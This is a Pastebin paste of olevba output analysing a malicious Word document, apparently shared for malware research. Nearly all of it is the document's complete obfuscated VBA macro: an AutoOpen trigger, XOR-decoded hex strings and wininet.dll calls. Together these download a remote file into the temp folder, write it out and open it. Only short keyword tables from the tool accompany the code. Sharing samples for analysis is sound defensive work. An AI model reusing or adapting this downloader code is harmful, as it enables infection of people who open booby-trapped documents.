API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Apr 17th, 2015
521
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 13.10 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- cswift~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: cswift~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: cswift~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub DWIGHT(FELIX As Long)
  17. SHAUN
  18. End Sub
  19.  
  20. Sub autoopen()
  21. DWIGHT 333
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO OIDL8.bas
  32. in file: cswift~1.doc - OLE stream: u'Macros/VBA/OIDL8'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35. Public Function JEREMIAH(ByRef JULIUS As String, ByRef DONNIE As Long) As Integer
  36. JEREMIAH = Asc(MARION(33, JULIUS, _
  37.         ((DONNIE Mod ANTONIO(JULIUS)) + 1), 1))
  38. End Function
  39. Public Function SHANNON() As Object
  40. Dim TREVOR As String
  41. TREVOR = ALBERT(JULIO, LANCE)
  42. Set SHANNON = CreateObject(TREVOR)
  43. End Function
  44.  
  45.  
  46.  
  47.  
  48. Public Function DERRICK(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
  49.  
  50. Dim GERARD As Long
  51. Set OLIVER = HUBERT(SHANNON)
  52.  
  53. Dim HECTOR
  54.  
  55. Dim KENNY As String
  56. KENNY = HERMAN(2048, JULIO, DUANE)
  57.  
  58. For GERARD = 292 To 293
  59. GERARD = GERARD * 1
  60. Next GERARD
  61. HECTOR = OLIVER & KENNY
  62.  
  63.  
  64. If SIDNEY(HOMER, HECTOR) Then
  65. HOMER. _
  66. DeleteFile HECTOR
  67. End If
  68. If WILBUR(3, HECTOR) Then
  69. End If
  70. If SIDNEY(HOMER, HECTOR) Then
  71. End If
  72.  
  73.  
  74. DERRICK = RICARDO(OLIVER, KENNY, 7.2)
  75.  
  76. End Function
  77.  
  78. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  79. ANALYSIS:
  80. +------------+--------------+--------------------------+
  81. | Type       | Keyword      | Description              |
  82. +------------+--------------+--------------------------+
  83. | Suspicious | CreateObject | May create an OLE object |
  84. +------------+--------------+--------------------------+
  85. -------------------------------------------------------------------------------
  86. VBA MACRO PIDLE0.bas
  87. in file: cswift~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
  88. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  89. Public Function HUBERT(ByRef NICHOLAS As Object) As Object
  90. Set HUBERT = NICHOLAS.GetSpecialFolder(2)
  91. End Function
  92. Sub ALFONSO(CALEIGH As Double)
  93.  
  94. CAMERON ("BRUCE")
  95. End Sub
  96.  
  97.  
  98.  
  99. Public Function RICARDO(ByRef OLIVER As Object, ByRef KENNY As String, RUBEN As Double) As Boolean
  100.  
  101. Set SHANE = CreateObject _
  102. (ALBERT _
  103. (JULIO, CECIL))
  104. Dim BRETT As Integer
  105. BRETT = SHANE.Open(OLIVER & KENNY)
  106. End Function
  107.  
  108. Public Function ALBERT(JULIUS As String, ADAM As String) As String
  109.    
  110.     Dim PERRY As Integer
  111.     Dim SERGIO As Integer
  112.    
  113.    
  114.     Dim WAYNE As Double
  115. For WAYNE = 42 To 43
  116. If WAYNE = 32 Then End
  117. Next WAYNE
  118.    
  119.     Dim DONNIE As Long
  120.     Dim STEVE As String
  121.     For DONNIE = 1 _
  122.     To _
  123.     ( _
  124.     ANTONIO _
  125.     (ADAM) _
  126.     / 2)
  127.         PERRY = CHRIS(ADAM, DONNIE)
  128.         SERGIO = JEREMIAH(JULIUS, DONNIE)
  129.         STEVE = STEVE + PHILIP(PERRY, SERGIO)
  130.     Next DONNIE
  131.    ALBERT = STEVE
  132. End Function
  133.  
  134. Public Function CAMERON(REX As String)
  135. Dim NEAL As Double
  136. NEAL = 5.5
  137. CARLTON NEAL * 8.8
  138. NEAL = NEAL + 1
  139. End Function
  140. Sub SHAUN()
  141.         Dim MATT As Long
  142.  
  143.     Dim LYLE As Long
  144. For LYLE = 2 To 4
  145. LYLE = LYLE * 6
  146. Next LYLE
  147.  
  148. ALFONSO (4.4)
  149.  
  150. End Sub
  151.  
  152.  
  153.  
  154.  
  155.  
  156. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  157. ANALYSIS:
  158. +------------+--------------+--------------------------+
  159. | Type       | Keyword      | Description              |
  160. +------------+--------------+--------------------------+
  161. | Suspicious | CreateObject | May create an OLE object |
  162. | Suspicious | Open         | May open a file          |
  163. +------------+--------------+--------------------------+
  164. -------------------------------------------------------------------------------
  165. VBA MACRO IDL4.bas
  166. in file: cswift~1.doc - OLE stream: u'Macros/VBA/IDL4'
  167. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  168.  
  169.  
  170.  
  171. Public Function CARLTON(ERNESTO As Double)
  172.  
  173. Dim LUTHER As Object
  174.  
  175.  
  176.     Dim FREDRICK As Long
  177. For FREDRICK = 814 To 815
  178. FREDRICK = FREDRICK + 35
  179. Next FREDRICK
  180.    
  181.  
  182. Dim WENDELL  As Object
  183.  
  184.  
  185. For FREDRICK = 710 To 711
  186. FREDRICK = FREDRICK + 5
  187. Next FREDRICK
  188.    
  189.  
  190. Set WENDELL _
  191. = SHANNON()
  192. ERNESTO = ERNESTO + 7
  193. For FREDRICK = 232 To 233
  194. FREDRICK = FREDRICK + 28
  195. Next FREDRICK
  196. Dim LEWIS As Boolean
  197.  
  198. LEWIS = DERRICK(LUTHER, WENDELL)
  199. End Function
  200.  
  201.  
  202. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  203. ANALYSIS:
  204. No suspicious keyword or IOC found.
  205. -------------------------------------------------------------------------------
  206. VBA MACRO FILE6.bas
  207. in file: cswift~1.doc - OLE stream: u'Macros/VBA/FILE6'
  208. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  209.  
  210. Option Explicit
  211.  
  212. Public Const CECIL = "1F292E292B7C003E242E25222A312E3D2F"
  213. Public Const DUANE = "10263924292679277A273424"
  214. Public Const LONNIE = "24353F357D7D6E213B2E2D26223322216F2D3B2F63737F6A70617260313A29"
  215. Public Const LANCE = "1F22392C37262820336C0A282720142B323A312F032321202426"
  216. Public Const JULIO = "BLAKEGRANT"
  217.  
  218. Private Const ORLANDO = 4000
  219. Private Const KURT As String = "NELSON"
  220. Private Const ALLAN = 1
  221. Private Const CLAYTON = &H4000000
  222.  
  223.  
  224.  
  225. Public Function PHILIP(ByRef PERRY As Integer, ByRef SERGIO As Integer) As String
  226.     PHILIP = Chr(PERRY Xor SERGIO)
  227. End Function
  228.  
  229. Public Function CHRIS(ByRef ADAM As String, ByRef DONNIE As Long) As Integer
  230.  CHRIS = Val("&H" & (MARION(32, ADAM, JOHNNY(DONNIE), 2)))
  231. End Function
  232. Public Function JOHNNY(ByRef DONNIE As Long) As Long
  233.  JOHNNY = (2 * DONNIE) - 1
  234. End Function
  235.  
  236. Public Function WILBUR(LORENZO As Long, ByVal OMAR As String) As Boolean
  237.     #If VBA7 _
  238.     And Win64 Then
  239.         Dim LEONARD As LongPtr, STANLEY As LongPtr
  240.     #Else
  241.         Dim LEONARD As Long, STANLEY As Long
  242.     #End If
  243.     Dim FRANK As Long
  244.     Dim MARK As String * ORLANDO, CHARLES As String
  245.     Dim MIKE As Integer, NATHAN As Double
  246.     LEONARD = TERRANCE
  247.     If LEONARD = 0 Then
  248.         Exit Function
  249.     End If
  250.     Dim STEPHEN As Boolean
  251.    
  252.     If DARYL(STANLEY, LEONARD) Then
  253.     End If
  254.     If STANLEY = 0 Then
  255.         NATHAN = 0
  256.     Else
  257.         WALLACE STANLEY, MARK, ORLANDO, FRANK
  258.         CHARLES = MARK
  259.           Dim RAYMOND As Long
  260. For RAYMOND = 321 To 322
  261. If RAYMOND = 1232 Then End
  262. Next RAYMOND
  263.         Do While FRANK <> 0
  264.             WALLACE STANLEY, MARK, ORLANDO, FRANK
  265.                     CHARLES = CHARLES + Mid(MARK, 1, FRANK)
  266.         Loop
  267.              NATHAN = ANTONIO(CHARLES): _
  268.              MIKE = DANNY("JERRY")
  269.         Open OMAR _
  270.             For Binary Access Write _
  271.         Lock Write _
  272.         As #MIKE
  273.         Put #MIKE, _
  274.                 , CHARLES
  275.         Dim DENNIS As Double
  276.             For DENNIS = 42 To 43
  277.     If DENNIS = 437 Then End
  278. Next DENNIS
  279.         Close #MIKE
  280.     End If
  281.     EVERETT STANLEY
  282.     EVERETT LEONARD
  283.     CHARLES = ""
  284.     If NATHAN Then
  285.         WILBUR = True
  286.     End If
  287. End Function
  288.  
  289.  
  290. Public Function ANTONIO(SALVADOR As String) As Long
  291. ANTONIO = Len(SALVADOR)
  292. End Function
  293. Public Function DANNY(SALVADOR As String) As Integer
  294.     DANNY = FreeFile
  295. End Function
  296.  
  297.  
  298.  
  299.  
  300. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  301. ANALYSIS:
  302. +------------+-------------+-----------------------------------------+
  303. | Type       | Keyword     | Description                             |
  304. +------------+-------------+-----------------------------------------+
  305. | Suspicious | Open        | May open a file                         |
  306. | Suspicious | Write       | May write to a file (if combined with   |
  307. |            |             | Open)                                   |
  308. | Suspicious | Put         | May write to a file (if combined with   |
  309. |            |             | Open)                                   |
  310. | Suspicious | Chr         | May attempt to obfuscate specific       |
  311. |            |             | strings                                 |
  312. | Suspicious | Xor         | May attempt to obfuscate specific       |
  313. |            |             | strings                                 |
  314. | Suspicious | Binary      | May read or write a binary file (if     |
  315. |            |             | combined with Open)                     |
  316. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  317. |            |             | be used to obfuscate strings (option    |
  318. |            |             | --decode to see all)                    |
  319. +------------+-------------+-----------------------------------------+
  320. -------------------------------------------------------------------------------
  321. VBA MACRO IDL3.bas
  322. in file: cswift~1.doc - OLE stream: u'Macros/VBA/IDL3'
  323. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  324.  
  325.  
  326.  
  327.  
  328. Public Const JAMES = "JOHN"
  329.  
  330. #If VBA7 And Win64 Then
  331. Public _
  332. Declare _
  333. PtrSafe _
  334. Function _
  335. EVERETT Lib _
  336. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  337. Public _
  338. Declare _
  339. PtrSafe _
  340. Function _
  341. EDUARDO Lib _
  342. "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal OMARPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr
  343. Public _
  344. Declare _
  345. PtrSafe _
  346. Function _
  347. WALLACE Lib _
  348. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  349. Public _
  350. Declare _
  351. PtrSafe _
  352. Function _
  353. ALFREDO Lib _
  354. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  355. #Else
  356. Public Declare Function EVERETT Lib "wininet.dll" _
  357. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  358. Public Declare Function EDUARDO Lib "wininet.dll" _
  359. Alias "InternetOpenA" (ByVal CHARLES As String, ByVal OMARPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long
  360. Public Declare Function WALLACE Lib "wininet.dll" _
  361. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  362. Public Declare Function ALFREDO Lib "wininet.dll" _
  363. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  364. #End If
  365.  
  366. Public Function SIDNEY(ByRef JULIAN As Object, ByVal ISAAC As String) As Boolean
  367. If JULIAN.FileExists(ISAAC) Then
  368. SIDNEY = True
  369. Else
  370. SIDNEY = False
  371. End If
  372. End Function
  373. #If VBA7 _
  374.     And Win64 Then
  375.        Public Function DARYL(ByRef CLIFTON As LongPtr, MORRIS As LongPtr) As Boolean
  376.     #Else
  377.        Public Function DARYL(ByRef CLIFTON As Long, MORRIS As Long) As Boolean
  378.     #End If
  379. Dim WILLARD As String
  380. Dim HOWARD As Long
  381.     WILLARD _
  382.     = HERMAN(21, JULIO, LONNIE)
  383.    
  384.                 CLIFTON _
  385.     = ALFREDO _
  386.     ( _
  387.     MORRIS, _
  388.     WILLARD, vbNullString, _
  389.     0, _
  390.     CLAYTON, 0)
  391.     DARYL = True
  392. End Function
  393.  
  394.  
  395. Public Function MARION(TRACY As Long, ByRef SALVADOR As String, ByRef PERRY As Integer, ByRef SERGIO As Integer) As String
  396.     MARION = Mid$(SALVADOR, PERRY, SERGIO)
  397.     TRACY = TRACY + 50
  398. End Function
  399. #If VBA7 _
  400.     And Win64 Then
  401. Public Function TERRANCE() As LongPtr
  402.  #Else
  403. Public Function TERRANCE() As Long
  404.  
  405.  #End If
  406.  
  407.  TERRANCE = EDUARDO(KURT, ALLAN, vbNullString, vbNullString, 0)
  408. End Function
  409.  
  410. Public Function HERMAN(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
  411. FREDDIE = FREDDIE * 2
  412. HERMAN = ALBERT(TERRENCE, ENRIQUE)
  413.    
  414. End Function
  415.  
  416.  
  417.  
  418.  
  419.  
  420.  
  421. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  422. ANALYSIS:
  423. +------------+----------------+-----------------------------------------+
  424. | Type       | Keyword        | Description                             |
  425. +------------+----------------+-----------------------------------------+
  426. | Suspicious | Lib            | May run code from a DLL                 |
  427. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  428. |            |                | may be used to obfuscate strings        |
  429. |            |                | (option --decode to see all)            |
  430. | IOC        | wininet.dll    | Executable file name                    |
  431. +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!